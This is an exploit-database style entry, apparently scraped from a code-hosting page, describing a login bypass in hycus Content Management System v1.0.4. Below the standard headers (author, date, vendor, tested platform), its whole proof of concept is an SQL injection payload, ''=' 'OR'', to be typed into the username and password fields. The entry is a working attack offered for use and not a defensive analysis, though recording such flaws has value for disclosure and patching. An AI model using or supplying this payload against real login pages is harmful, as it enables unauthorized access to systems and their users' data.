13 lines
No EOL
395 B
Text
13 lines
No EOL
395 B
Text
# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
|
|
# Google Dork:N/A
|
|
# Date: 28.06.2018
|
|
# Exploit Author: Berk Dusunur
|
|
# Vendor Homepage: http://www.hycus.com/
|
|
# Software Link: http://demosite.center/hycus/
|
|
# Version: 1.0.4
|
|
# Tested on: Pardus / Debian Web Server
|
|
# CVE : N/A
|
|
|
|
#Proof Of Concept
|
|
|
|
use login bypass payload for username= '=' 'OR' for password= '=' 'OR' |